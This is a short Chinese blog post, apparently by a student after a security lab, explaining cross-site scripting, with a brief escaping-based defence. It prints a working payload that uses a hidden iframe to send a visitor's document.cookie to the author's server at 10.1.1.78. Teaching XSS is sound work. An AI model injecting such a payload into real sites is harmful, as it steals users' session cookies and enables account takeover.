#信息安全# 浅谈XSS跨站脚本攻击

欢迎访问个人博客https://lyp123.com

今天没啥实际内容，刚做了信息安全的第一个实验，关于XSS跨站攻击的，觉得这个东西还是蛮有用的（切勿做不好的事啊哈哈哈哈），就分享出来。

1.原理分析

XSS(Cross Site Scripting)，即跨站脚本攻击，是一种常见于web application中的计算机安全漏洞。XSS通过在用户端注入恶意的可运行脚本，若服务器端对用户输入不进行处理，直接将用户输入输出到浏览器，则浏览器将会执行用户注入的脚本。说白了就是用户输入到了网页上面，然后浏览器识别为正常的代码了，将其执行了，而此时你可以注入任何js代码，包括获取用户cookie信息并转发至指定服务器。

2.实例再现

代码很短：

<script>
    document.write("<iframe width=0 height=0 src='http://10.1.1.78/cookie.asp?cookie="+document.cookie+"'></iframe>");
</script>

简要说一下就是在加载网页的时候，浏览器会加载iframe里面的恶意网页，而里面的10.1.1.78是我的本地服务器，当用户访问我的网站的时候会顺带访问上述站点，就将他的cookie写入了我的服务器上写好的代码里，就实现了窃取的功能

3.防范措施

防范起来也很简单，只要在所有的用户输入的地方将可能的恶意代码比如html里面的特殊符号进行转义，就不会有问题啦 :idea: